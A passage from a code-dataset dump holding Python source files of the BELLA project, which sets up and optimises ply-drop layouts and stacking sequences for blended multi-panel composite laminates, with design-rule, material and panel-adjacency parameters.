rule at laminate surfaces\r\npdl_spacing = True # ply drop spacing rule\r\nmin_drop = 2 # Minimum number of continuous plies between ply drops\r\n\r\nconstraints = Constraints(\r\n sym=sym,\r\n bal=bal,\r\n oopo=oopo,\r\n dam_tol=dam_tol,\r\n dam_tol_rule=dam_tol_rule,\r\n covering=covering,\r\n n_covering=n_covering,\r\n rule_10_percent=rule_10_percent,\r\n 
rule_10_Abdalla=rule_10_Abdalla,\r\n percent_Abdalla=percent_Abdalla,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n diso=diso,\r\n contig=contig,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n set_of_angles=set_of_angles,\r\n min_drop=min_drop,\r\n pdl_spacing=pdl_spacing)\r\n\r\n### Objective function parameters ---------------------------------------------\r\n\r\n# Coefficient for the 10% rule penalty\r\ncoeff_10 = 1\r\n# Coefficient for the contiguity constraint penalty\r\ncoeff_contig = 1\r\n# Coefficient for the disorientation constraint penalty\r\ncoeff_diso = 10\r\n# Coefficient for the out-of-plane orthotropy penalty\r\ncoeff_oopo = 1\r\n# Coefficient for the ply drop spacing guideline penalty\r\ncoeff_spacing = 1\r\n\r\n# Lamination-parameter weightings in panel objective functions\r\n# (In practice these weightings can be different for each panel)\r\noptimisation_type = 'AD'\r\nif optimisation_type == 'A':\r\n if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n lampam_weightings = np.array([1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0])\r\n else:\r\n lampam_weightings = np.array([1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0])\r\nelif optimisation_type == 'D':\r\n if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n lampam_weightings = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n else:\r\n lampam_weightings = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1])\r\nelif optimisation_type == 'AD':\r\n if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n lampam_weightings = np.array([1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n else:\r\n lampam_weightings = np.array([1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])\r\n\r\n\r\n# Weightings of the panels in the multi-panel objective function\r\npanel_weightings = np.ones((n_panels,), float)\r\n\r\nobj_func_param = ObjFunction(\r\n constraints=constraints,\r\n coeff_contig=coeff_contig,\r\n coeff_diso=coeff_diso,\r\n coeff_10=coeff_10,\r\n coeff_oopo=coeff_oopo,\r\n coeff_spacing=coeff_spacing)\r\n\r\n### Material properties -------------------------------------------------------\r\n\r\n# Elastic modulus in the fibre direction in Pa\r\nE11 = 20.5/1.45038e-10 # 141 GPa\r\n# Elastic modulus in the transverse direction in Pa\r\nE22 = 1.31/1.45038e-10 # 9.03 GPa\r\n# Poisson's ratio relating transverse deformation and axial loading (-)\r\nnu12 = 0.32\r\n# In-plane shear modulus in Pa\r\nG12 = 0.62/1.45038e-10 # 4.27 GPa\r\n# Density in g/m2\r\ndensity_area = 300.5\r\n# Ply thickness in m\r\nply_t = (25.40/1000)*0.0075 # 0.191 mm\r\n\r\nmaterials = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n\r\n### Multi-panel composite laminate layout -------------------------------------\r\n\r\n# panel IDs\r\nif sheet == 'SST-40-60':\r\n # panel IDs\r\n ID = np.arange(1, 7)\r\n # number of plies in each panel\r\n n_plies_per_panel = np.arange(40, 61, 4)\r\nelif sheet == 'SST-80-120':\r\n # panel IDs\r\n ID = np.arange(1, 12)\r\n # number of plies in each panel\r\n n_plies_per_panel = np.arange(80, 121, 4)\r\nelif sheet == 'SST-120-180':\r\n # panel IDs\r\n ID = np.arange(1, 17)\r\n # number of plies in each panel\r\n n_plies_per_panel = np.arange(120, 181, 4)\r\n\r\n# panels adjacency\r\nneighbour_panels = dict()\r\nneighbour_panels[1] = [2]\r\nneighbour_panels[n_panels] = [n_panels - 1]\r\nfor i in range(2, n_panels):\r\n 
neighbour_panels[i] = [i - 1, i + 1]\r\n\r\nsst = pd.read_excel(filename_input, sheet_name=sheet).fillna(-1)\r\nsst = np.array(sst, int).T\r\nsst = np.hstack((sst, np.flip(sst, axis=1)))\r\nsst = sst[::2]\r\n\r\nss = convert_sst_to_ss(sst)\r\n\r\n# panel lamination parameter targets\r\nlampam_targets = [calc_lampam(stack) for stack in ss]\r\n\r\npanels = []\r\nfor ind_panel in range(n_panels):\r\n panels.append(Panel(\r\n ID=ID[ind_panel],\r\n lampam_target=lampam_targets[ind_panel],\r\n lampam_weightings=lampam_weightings,\r\n n_plies=len(ss[ind_panel]),\r\n length_x=0,\r\n length_y=0,\r\n N_x=0,\r\n N_y=0,\r\n area=0,\r\n weighting=panel_weightings[ind_panel],\r\n neighbour_panels=neighbour_panels[ID[ind_panel]],\r\n constraints=constraints))\r\n\r\nmultipanel = MultiPanel(panels)\r\nmultipanel.filter_target_lampams(constraints, obj_func_param)\r\nmultipanel.filter_lampam_weightings(constraints, obj_func_param)\r\n\r\n### Checks for feasibility of the multi-panel composite layout ----------------\r\n\r\ncheck_ply_drop_rules(sst, multipanel, constraints, reduced=False)\r\n\r\nfor stack in ss:\r\n check_lay_up_rules(stack, constraints)\r\n\r\n### Save data -----------------------------------------------------------------\r\n\r\nsave_multipanel(filename_res, multipanel, obj_func_param, calc_penalties=True,\r\n constraints=constraints, sst=sst)\r\nsave_constraints_BELLA(filename_res, constraints)\r\nsave_objective_function_BELLA(filename_res, obj_func_param)\r\nsave_materials(filename_res, materials)\r\nautofit_column_widths(filename_res)"
},
{
"alpha_fraction": 0.6246612668037415,
"alphanum_fraction": 0.6350497007369995,
"avg_line_length": 29.628570556640625,
"blob_id": "91817e1a55adfe6462cdbfc2adfb45b5553d5d1b",
"content_id": "f3530288a5b515b1adea76b3973353aa23e50a25",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2214,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 70,
"path": "/src/LAYLA_V02/ply_order.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions to calculate the order in which plies are optimised\r\n\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\ndef calc_ply_order(constraints, targets):\r\n \"\"\"\r\n calulates the order in which plies are optimised\r\n\r\n OUTPUTS\r\n\r\n - ply_order: array of the ply indices sorted in the order in which plies\r\n are optimised (middle ply of symmetric laminates included)\r\n\r\n INPUTS\r\n\r\n - constraints: lay-up design guidelines\r\n - targets: target lamination parameters and ply counts\r\n \"\"\"\r\n if constraints.sym:\r\n ply_order = np.arange(targets.n_plies // 2 + targets.n_plies % 2)\r\n return ply_order\r\n\r\n order_before_sorting = np.arange(targets.n_plies)\r\n ply_order = np.zeros((targets.n_plies,), int)\r\n ply_order[0::2] = order_before_sorting[\r\n :targets.n_plies // 2 + targets.n_plies % 2]\r\n ply_order[1::2] = order_before_sorting[\r\n targets.n_plies // 2 + targets.n_plies % 2:][::-1]\r\n return ply_order\r\n\r\ndef calc_levels(ply_order, n_plies_in_groups, n_groups):\r\n \"\"\"\r\n calulates the indices of the plies for each ply group optimisation\r\n\r\n INPUTS\r\n\r\n - ply_order: array of the ply indices sorted in the order in which plies\r\n are optimised (middle ply of symmetric laminates included)\r\n - n_plies_in_groups: number of plies in each ply group\r\n - n_groups: number of ply groups\r\n \"\"\"\r\n levels_in_groups = [None]*n_groups\r\n for ind_group in range(n_groups):\r\n levels_in_groups[ind_group] = []\r\n\r\n ind_all_plies = 0\r\n for ind_group in range(n_groups):\r\n for ind_plies in range(n_plies_in_groups[ind_group]):\r\n levels_in_groups[ind_group].append(ply_order[ind_all_plies])\r\n ind_all_plies += 1\r\n\r\n return levels_in_groups\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n sys.path.append(r'C:\\BELLA_and_LAYLA')\r\n from src.LAYLA_V02.parameters import Parameters\r\n from src.LAYLA_V02.constraints import Constraints\r\n from src.LAYLA_V02.targets import Targets\r\n constraints = Constraints(sym=False)\r\n targets = Targets(n_plies=6)\r\n ply_order = calc_ply_order(constraints, targets)\r\n print(ply_order)\r\n"
},
{
"alpha_fraction": 0.5646512508392334,
"alphanum_fraction": 0.5718854665756226,
"avg_line_length": 35.090396881103516,
"blob_id": "d71641d499ee95dcdcb334a8a31d51e9352582a1",
"content_id": "a4b7142e55c938ec861124f75f77ecf0bd556d0f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13132,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 354,
"path": "/src/BELLA/pdl_ini.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreate ply drop layout\r\n\r\nAll stacking sequences are subsets from the stacking sequence of the thickest\r\npanels.\r\n\r\n- read_pdls_excel\r\n reads ply drop layout inputs in Excel file\r\n\r\n- check_pdls_ini\r\n checks that the initial ply drop layouts have the correct numbers of panels\r\n and numbers of plies per panel\r\n\r\n- create_initial_pdls\r\n creates ply drop layouts for a blended structure\r\n\r\n- create_initial_pdl\r\n creates a ply drop layout for a blended structure\r\n\r\n\"\"\"\r\nimport sys\r\nimport time\r\nimport pandas as pd\r\nimport numpy as np\r\nimport numpy.matlib\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.BELLA.divide_panels import divide_panels\r\nfrom src.BELLA.pdl_group import randomly_pdl_guide\r\nfrom src.BELLA.pdl_tools import global_pdl_from_local_pdl\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\nfrom src.divers.pretty_print import print_list_ss\r\n#from src.guidelines.ply_drop_spacing import indic_violation_ply_drop_spacing\r\n#from src.guidelines.one_stack import check_ply_drop_rules\r\n\r\ndef read_pdls_excel(filename):\r\n \"\"\"\r\n reads ply drop layout inputs in Excel file\r\n \"\"\"\r\n pdls = []\r\n ind_pdl = 1\r\n while True:\r\n try:\r\n pdl = pd.read_excel(\r\n filename, sheet_name='pdl' + str(ind_pdl), dtype='int',\r\n header=None, )\r\n except:\r\n break\r\n finally:\r\n ind_pdl += 1\r\n pdls.append(np.array(pdl))\r\n ind_pdl -= 2\r\n print(' ' + str(ind_pdl) + ' intial ply-drop layouts read.')\r\n return pdls\r\n\r\n\r\ndef check_pdls_ini(multipanel, pdls_ini):\r\n \"\"\"\r\n checks that the initial ply drop layouts have the correct numbers of panels\r\n and numbers of plies per panel\r\n \"\"\"\r\n for pdl in pdls_ini:\r\n if pdl.shape[0] != multipanel.reduced.n_panels:\r\n print(pdl.shape[0], multipanel.reduced.n_panels)\r\n raise Exception(\"\"\"\r\nInitial ply drop layout with wrong number of panels\"\"\")\r\n for ind_panel, pdl_panel in enumerate(pdl):\r\n if pdl_panel[pdl_panel != -1].size \\\r\n != multipanel.reduced.panels[ind_panel].n_plies:\r\n raise Exception(\"\"\"\r\nInitial ply drop layout with wrong number of plies per panel\"\"\")\r\n print(' Sizes of the intial ply-drop layouts checked.')\r\n return None\r\n\r\n\r\ndef create_initial_pdls(multipanel, constraints, parameters, obj_func_param):\r\n \"\"\"\r\n creates ply drop layouts for a blended structure with no duplicates\r\n \"\"\"\r\n t_ini= time.time()\r\n\r\n pdls_perfect = np.zeros((\r\n parameters.n_ini_ply_drops,\r\n multipanel.reduced.n_panels,\r\n multipanel.n_plies_max), int)\r\n pdls_imperfect = np.zeros((\r\n parameters.n_ini_ply_drops,\r\n multipanel.reduced.n_panels,\r\n multipanel.n_plies_max), int)\r\n\r\n p_pdls_imperfect = np.zeros((parameters.n_ini_ply_drops,), dtype=float)\r\n\r\n ind_imperfect = 0\r\n ind_perfect = 0\r\n t_ini = time.time()\r\n elapsed_time = 0\r\n\r\n\r\n while ind_perfect < parameters.n_ini_ply_drops\\\r\n and elapsed_time < parameters.time_limit_all_pdls:\r\n\r\n# print('ind_perfect', ind_perfect)\r\n# print('ind_imperfect', ind_imperfect)\r\n\r\n new_pdl = create_initial_pdl(multipanel, constraints, parameters,\r\n obj_func_param)\r\n\r\n# print('new_pdl')\r\n# print_list_ss(new_pdl)\r\n\r\n# if constraints.sym and 
multipanel.has_middle_ply:\r\n# pdl_after=np.flip(new_pdl[:, 1:], axis=1)\r\n# elif constraints.sym:\r\n# pdl_after=np.flip(new_pdl[:, :], axis=1)\r\n# else:\r\n# pdl_after=None\r\n\r\n new_penalty_spacing = calc_penalty_spacing(\r\n pdl=new_pdl,\r\n pdl_after=None,\r\n multipanel=multipanel,\r\n obj_func_param=obj_func_param,\r\n constraints=constraints,\r\n on_blending_strip=True)\r\n\r\n elapsed_time = time.time() - t_ini\r\n\r\n # Store the new pdl if it is perfect (no violation of manufacturing\r\n # constraint) or if it is among the parameters.n_ini_ply_drops best\r\n # unmanufacturable solutions found so far\r\n if new_penalty_spacing == 0:\r\n\r\n # To remove duplicates\r\n is_double = False\r\n for ind in range(ind_perfect):\r\n if (new_pdl - pdls_perfect[ind] == 0).all():\r\n is_double = True\r\n break\r\n if is_double:\r\n continue\r\n pdls_perfect[ind_perfect] = new_pdl\r\n ind_perfect += 1\r\n\r\n else:\r\n # To only keep the imperfect pdl with the smallest penalties\r\n if ind_imperfect >= parameters.n_ini_ply_drops:\r\n if new_penalty_spacing < max(p_pdls_imperfect):\r\n # To remove duplicates\r\n is_double = False\r\n for ind in range(ind_imperfect):\r\n if np.allclose(new_pdl, pdls_imperfect[ind]):\r\n is_double = True\r\n break\r\n if is_double:\r\n continue\r\n #print('is_double', is_double)\r\n indexx = np.argmin(p_pdls_imperfect)\r\n pdls_imperfect[indexx] = new_pdl\r\n p_pdls_imperfect[indexx] = new_penalty_spacing\r\n else:\r\n # To remove duplicates\r\n is_double = False\r\n for ind in range(ind_imperfect):\r\n if np.allclose(new_pdl, pdls_imperfect[ind]):\r\n is_double = True\r\n break\r\n if is_double:\r\n continue\r\n #print('is_double', is_double)\r\n# print(new_pdl)\r\n# print(ind_imperfect)\r\n# print(pdls_imperfect.shape)\r\n pdls_imperfect[ind_imperfect] = new_pdl\r\n p_pdls_imperfect[ind_imperfect] = new_penalty_spacing\r\n ind_imperfect += 1\r\n\r\n # if the time limit is reached\r\n if elapsed_time >= parameters.time_limit_all_pdls:\r\n\r\n pdls_imperfect = pdls_imperfect[:ind_imperfect]\r\n p_pdls_imperfect = p_pdls_imperfect[:ind_imperfect]\r\n# print('pdls_perfect', pdls_perfect)\r\n# print('pdls_imperfect', pdls_imperfect)\r\n\r\n if not ind_imperfect + ind_perfect:\r\n raise Exception(\"\"\"\r\nNo conform ply drop layout can be generated.\r\nToo many ply drops between two adjacent panels.\"\"\")\r\n\r\n # add the non-manufacturable ply drop layouts\r\n for ind in range(ind_perfect, parameters.n_ini_ply_drops):\r\n indexx = np.argmin(p_pdls_imperfect)\r\n pdls_perfect[ind] = pdls_imperfect[indexx]\r\n p_pdls_imperfect[indexx] = 10e6\r\n\r\n print(' ' + str(ind_perfect) \\\r\n + ' feasible initial ply-drop layouts generated.')\r\n print(' ' + str(parameters.n_ini_ply_drops - ind_perfect) \\\r\n + ' infeasible initial ply-drop layouts generated.')\r\n\r\n return pdls_perfect\r\n\r\n # if enough manufacturable ply drop layouts have been found\r\n print(' ' + str(parameters.n_ini_ply_drops) \\\r\n + ' feasible initial ply-drop layouts generated.')\r\n\r\n return pdls_perfect\r\n\r\ndef create_initial_pdl(multipanel, constraints, parameters, obj_func_param):\r\n \"\"\"\r\n creates a ply drop layout for a blended structure\r\n\r\n - obj_func_param: objective function parameters\r\n \"\"\"\r\n if constraints.sym:\r\n pdl_before_cummul = [None]*(multipanel.reduced.n_groups + 1)\r\n\r\n for index_pdl in range(len(pdl_before_cummul)):\r\n pdl_before_cummul[index_pdl] = None\r\n\r\n # plies for covering rule (including damage tolerance)\r\n if 
constraints.n_covering == 1:\r\n pdl_before_cummul[0] = np.matlib.repmat(\r\n np.array([0], dtype=int), multipanel.reduced.n_panels, 1)\r\n elif constraints.n_covering == 2:\r\n pdl_before_cummul[0] = np.matlib.repmat(\r\n np.array([0, 1], dtype=int), multipanel.reduced.n_panels, 1)\r\n\r\n for inner_step in range(multipanel.reduced.n_groups):\r\n\r\n last_group = bool(inner_step == multipanel.reduced.n_groups - 1)\r\n\r\n covering_top = False\r\n\r\n # create group ply drop layouts\r\n n_ply_drops = multipanel.calc_ply_drops(inner_step)\r\n my_pdl = randomly_pdl_guide(\r\n multipanel=multipanel,\r\n boundaries=multipanel.reduced.boundaries,\r\n has_middle_ply=multipanel.has_middle_ply,\r\n middle_ply_indices=multipanel.reduced.middle_ply_indices,\r\n n_ply_drops=n_ply_drops,\r\n n_max=multipanel.reduced.n_plies_per_group[inner_step],\r\n parameters=parameters,\r\n obj_func_param=obj_func_param,\r\n constraints=constraints,\r\n pdl_before=pdl_before_cummul[inner_step],\r\n last_group=last_group,\r\n covering_top=covering_top)\r\n pdl_before_cummul[inner_step + 1] = my_pdl[0]\r\n\r\n return global_pdl_from_local_pdl(\r\n multipanel, constraints.sym, pdl_before_cummul)\r\n\r\n pdl_before_cummul = [None]*(multipanel.reduced.n_groups + 2)\r\n pdl_after_cummul = [None]*(multipanel.reduced.n_groups + 2)\r\n for index_pdl in range(len(pdl_before_cummul)):\r\n pdl_before_cummul[index_pdl] = None\r\n pdl_after_cummul[index_pdl] = None\r\n\r\n if constraints.n_covering == 1:\r\n pdl_before_cummul[0] = np.matlib.repmat(\r\n np.array([0], dtype=int), multipanel.reduced.n_panels, 1)\r\n pdl_after_cummul[1] = np.matlib.repmat(\r\n np.array([0], dtype=int), multipanel.reduced.n_panels, 1)\r\n elif constraints.n_covering == 2:\r\n pdl_before_cummul[0] = np.matlib.repmat(\r\n np.array([0, 1], dtype=int), multipanel.reduced.n_panels, 1)\r\n pdl_after_cummul[1] = np.matlib.repmat(\r\n np.array([0, 1], dtype=int), multipanel.reduced.n_panels, 1)\r\n\r\n for inner_step in range(multipanel.reduced.n_groups):\r\n last_group = bool(inner_step == multipanel.reduced.n_groups - 1)\r\n\r\n if inner_step % 2 == 0:\r\n pdl_before = pdl_before_cummul[inner_step]\r\n pdl_after = None\r\n else:\r\n pdl_before = None\r\n pdl_after = pdl_after_cummul[inner_step]\r\n\r\n covering_top = False\r\n covering_bottom = False\r\n\r\n # create group ply drop layouts\r\n n_ply_drops = multipanel.calc_ply_drops(inner_step)\r\n my_pdl = randomly_pdl_guide(\r\n multipanel=multipanel,\r\n boundaries=multipanel.reduced.boundaries,\r\n n_ply_drops=n_ply_drops,\r\n n_max=multipanel.reduced.n_plies_per_group[inner_step],\r\n pdl_before=pdl_before,\r\n pdl_after=pdl_after,\r\n last_group=last_group,\r\n parameters=parameters,\r\n obj_func_param=obj_func_param,\r\n constraints=constraints,\r\n covering_top=covering_top,\r\n covering_bottom=covering_bottom)\r\n# print(my_pdl)\r\n if inner_step % 2 == 0:\r\n pdl_before_cummul[inner_step + 2] = my_pdl[0]\r\n else:\r\n pdl_after_cummul[inner_step + 2] = my_pdl[0]\r\n\r\n return global_pdl_from_local_pdl(\r\n multipanel, constraints.sym, pdl_before_cummul, pdl_after_cummul)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print('\\n*** Test for the function create_initial_pdl ***')\r\n constraints = Constraints(\r\n sym=True,\r\n dam_tol=False,\r\n covering=False,\r\n pdl_spacing=True,\r\n min_drop=2)\r\n parameters = Parameters(constraints=constraints)\r\n obj_func_param = ObjFunction(constraints)\r\n n_plies_target1 = 21\r\n n_plies_target2 = 19\r\n n_plies_target3 = 18\r\n n_plies_target4 = 16\r\n 
panel_1 = Panel(ID=1,\r\n n_plies=n_plies_target1,\r\n constraints=constraints,\r\n neighbour_panels=[2])\r\n panel_2 = Panel(ID=2,\r\n n_plies=n_plies_target2,\r\n constraints=constraints,\r\n neighbour_panels=[1, 3])\r\n panel_3 = Panel(ID=3,\r\n n_plies=n_plies_target3,\r\n constraints=constraints,\r\n neighbour_panels=[2, 4])\r\n panel_4 = Panel(ID=4,\r\n n_plies=n_plies_target4,\r\n constraints=constraints,\r\n neighbour_panels=[3])\r\n multipanel = MultiPanel(panels=[panel_1, panel_2, panel_3, panel_4])\r\n multipanel.from_mp_to_blending_strip(constraints)\r\n divide_panels(multipanel, parameters, constraints)\r\n pdl_ini = create_initial_pdl(\r\n multipanel,\r\n constraints,\r\n parameters,\r\n obj_func_param)\r\n print(pdl_ini)\r\n\r\n"
},
{
"alpha_fraction": 0.49507978558540344,
"alphanum_fraction": 0.5832616686820984,
"avg_line_length": 32.76744079589844,
"blob_id": "b864ea0d9eb7c2a3ac1401bfd8650f3adc19eb61",
"content_id": "0e38d28e7dd3f64f9739f2386eebaccad434cb54",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10467,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 301,
"path": "/input-files/create_input_file_horseshoe2.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script saves the input file for the feasible horseshoe problem.\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\n\r\nimport sys\r\nimport pandas as pd\r\nimport numpy as np\r\nimport numpy.matlib\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.BELLA.materials import Material\r\nfrom src.BELLA.save_set_up import save_constraints_BELLA\r\nfrom src.BELLA.save_set_up import save_multipanel\r\nfrom src.BELLA.save_set_up import save_objective_function_BELLA\r\nfrom src.BELLA.save_set_up import save_materials\r\nfrom src.guidelines.one_stack import check_lay_up_rules\r\nfrom src.guidelines.one_stack import check_ply_drop_rules\r\nfrom src.divers.excel import delete_file, autofit_column_widths\r\n\r\nsheet = 'horseshoe2'\r\nfilename_input = '/BELLA/input-files/SST.xlsx'\r\nfilename_res = 'input_file_' + sheet + '.xlsx'\r\n\r\n# check for authorisation before overwriting\r\ndelete_file(filename_res)\r\n\r\n# number of panels\r\nn_panels = 18\r\n\r\n### Design guidelines ---------------------------------------------------------\r\n\r\nconstraints_set = 'C0'\r\nconstraints_set = 'C1'\r\n\r\n## lay-up rules\r\n\r\n# set of admissible fibre orientations\r\nset_of_angles = np.array([-45, 0, 45, 90], dtype=int)\r\nset_of_angles = np.array([\r\n -45, 0, 45, 90, +30, -30, +60, -60, 15, -15, 75, -75], dtype=int)\r\n\r\nsym = True # symmetry rule\r\noopo = False # out-of-plane orthotropy requirements\r\n\r\nif constraints_set == 'C0':\r\n bal = False # balance rule\r\n rule_10_percent = False # 10% rule\r\n diso = False # disorientation rule\r\n contig = False # contiguity rule\r\n dam_tol = False # damage-tolerance rule\r\nelse:\r\n bal = True\r\n rule_10_percent = True\r\n diso = True\r\n contig = True\r\n dam_tol = True\r\n\r\nrule_10_Abdalla = True # 10% rule restricting LPs instead of ply percentages\r\npercent_Abdalla = 10 # percentage limit for the 10% rule applied on LPs\r\ncombine_45_135 = True # True if restriction on +-45 plies combined for 10% rule\r\npercent_0 = 10 # percentage used in the 10% rule for 0 deg plies\r\npercent_45 = 0 # percentage used in the 10% rule for +45 deg plies\r\npercent_90 = 10 # percentage used in the 10% rule for 90 deg plies\r\npercent_135 = 0 # percentage used in the 10% rule for -45 deg plies\r\npercent_45_135 =10 # percentage used in the 10% rule for +-45 deg plies\r\ndelta_angle = 45 # maximum angle difference for adjacent plies\r\nn_contig = 5 # maximum number of adjacent plies with the same fibre orientation\r\ndam_tol_rule = 1 # type of damage tolerance rule\r\n\r\n## ply-drop rules\r\n\r\ncovering = True # covering rule\r\nn_covering = 1 # number of plies ruled by covering rule at laminate surfaces\r\npdl_spacing = True # ply drop spacing rule\r\nmin_drop = 2 # Minimum number of continuous plies between ply drops\r\n\r\nconstraints = Constraints(\r\n sym=sym,\r\n bal=bal,\r\n oopo=oopo,\r\n dam_tol=dam_tol,\r\n dam_tol_rule=dam_tol_rule,\r\n covering=covering,\r\n n_covering=n_covering,\r\n rule_10_percent=rule_10_percent,\r\n rule_10_Abdalla=rule_10_Abdalla,\r\n percent_Abdalla=percent_Abdalla,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n 
combine_45_135=combine_45_135,\r\n diso=diso,\r\n contig=contig,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n set_of_angles=set_of_angles,\r\n min_drop=min_drop,\r\n pdl_spacing=pdl_spacing)\r\n\r\n### Objective function parameters ---------------------------------------------\r\n\r\n# Coefficient for the 10% rule penalty\r\ncoeff_10 = 1\r\n# Coefficient for the contiguity constraint penalty\r\ncoeff_contig = 1\r\n# Coefficient for the disorientation constraint penalty\r\ncoeff_diso = 10\r\n# Coefficient for the out-of-plane orthotropy penalty\r\ncoeff_oopo = 1\r\n# Coefficient for the ply drop spacing guideline penalty\r\ncoeff_spacing = 1\r\n\r\n# Lamination-parameter weightings in panel objective functions\r\n# (In practice these weightings can be different for each panel)\r\noptimisation_type = 'AD'\r\nif optimisation_type == 'A':\r\n if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n lampam_weightings = np.array([1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0])\r\n else:\r\n lampam_weightings = np.array([1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0])\r\nelif optimisation_type == 'D':\r\n if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n lampam_weightings = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n else:\r\n lampam_weightings = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1])\r\nelif optimisation_type == 'AD':\r\n if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n lampam_weightings = np.array([1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n else:\r\n lampam_weightings = np.array([1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])\r\n\r\n## Multi-panel objective function\r\n\r\n# Weightings of the panels in the multi-panel objective function\r\npanel_weightings = np.ones((n_panels,), float)\r\n\r\nobj_func_param = ObjFunction(\r\n constraints=constraints,\r\n coeff_contig=coeff_contig,\r\n coeff_diso=coeff_diso,\r\n coeff_10=coeff_10,\r\n coeff_oopo=coeff_oopo,\r\n coeff_spacing=coeff_spacing)\r\n\r\n### Material properties -------------------------------------------------------\r\n\r\n# Elastic modulus in the fibre direction in Pa\r\nE11 = 20.5/1.45038e-10 # 141 GPa\r\n# Elastic modulus in the transverse direction in Pa\r\nE22 = 1.31/1.45038e-10 # 9.03 GPa\r\n# Poisson's ratio relating transverse deformation and axial loading (-)\r\nnu12 = 0.32\r\n# In-plane shear modulus in Pa\r\nG12 = 0.62/1.45038e-10 # 4.27 GPa\r\n# Density in g/m2\r\ndensity_area = 300.5\r\n# Ply thickness in m\r\nply_t = (25.40/1000)*0.0075 # 0.191 mm\r\n\r\nmaterials = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n\r\n### Multi-panel composite laminate layout -------------------------------------\r\n\r\n# panel IDs\r\nID = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18]\r\n\r\n# panel number of plies\r\nn_plies_per_panel = [32, 28, 20, 18, 16, 22, 18, 24, 38,\r\n 34, 30, 28, 22, 18, 24, 30, 18, 22]\r\n# panels adjacency\r\nneighbour_panels = {\r\n 1 : [2, 9],\r\n 2 : [1, 3, 6, 10],\r\n 3 : [2, 4, 6],\r\n 4 : [3, 5, 7],\r\n 5 : [4, 8],\r\n 6 : [2, 3, 7],\r\n 7 : [4, 6, 8],\r\n 8 : [5, 7],\r\n 9 : [1, 10, 11],\r\n 10 : [2, 9, 12],\r\n 11 : [9, 12],\r\n 12 : [10, 11, 13, 16],\r\n 13 : [12, 14, 16],\r\n 14 : [13, 15, 17],\r\n 15 : [14, 18],\r\n 16 : [12, 13, 17],\r\n 17 : [14, 16, 18],\r\n 18 : [15, 17]}\r\n\r\n# boundary weights\r\nboundary_weights = {(1, 2) : 0.610,\r\n (1, 9) : 0.457,\r\n (2, 3) : 0.305,\r\n (2, 6) : 0.305,\r\n (2, 10) : 0.457,\r\n (3, 4) : 0.305,\r\n (3, 6) : 0.508,\r\n (4, 5) : 
